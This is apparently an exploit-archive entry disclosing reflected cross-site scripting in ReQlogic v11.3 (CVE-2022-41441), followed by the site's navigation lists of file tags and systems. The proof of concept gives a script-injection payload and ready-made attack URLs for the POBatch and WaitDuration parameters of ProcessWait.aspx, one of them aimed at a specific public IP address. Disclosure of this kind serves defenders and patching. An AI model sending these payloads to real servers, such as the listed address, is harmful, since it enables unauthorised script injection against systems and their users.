    # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)# Date: 9 October 2022# Exploit Author: Okan Kurtulus# Vendor Homepage: https://reqlogic.com# Version: 11.3# Tested on: Linux# CVE : 2022-41441# Proof of Concept:1- Install ReQlogic v11.32- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=33- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.#XSS Payload:</script><script>alert(1)</script>#Affected PrametersPOBatchWaitDuration#Final URLshttp://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

**File Tags**

*   ActiveX (932)
*   Advisory (80,599)
*   Arbitrary (15,917)
*   BBS (2,859)
*   Bypass (1,653)
*   CGI (1,022)
*   Code Execution (7,047)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,306)
*   DoS (22,932)
*   Encryption (2,359)
*   Exploit (50,720)
*   File Inclusion (4,180)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,689)
*   Intrusion Detection (876)
*   Java (2,957)
*   JavaScript (830)
*   Kernel (6,449)
*   Local (14,297)
*   Magazine (586)
*   Overflow (12,543)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,502)
*   Python (1,488)
*   Remote (30,282)
*   Root (3,534)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,824)
*   Shell (3,133)
*   Shellcode (1,206)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,171)
*   TCP (2,384)
*   Trojan (687)
*   UDP (880)
*   Virus (663)
*   Vulnerability (31,381)
*   Web (9,467)
*   Whitepaper (3,740)
*   x86 (946)
*   XSS (17,581)
*   Other

**File Archives**

*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (370)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,714)
*   Fedora (1,691)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,130)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,923)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,448)
*   UNIX (9,208)
*   UnixWare (185)
*   Windows (6,532)
*   Other

Tag

#debian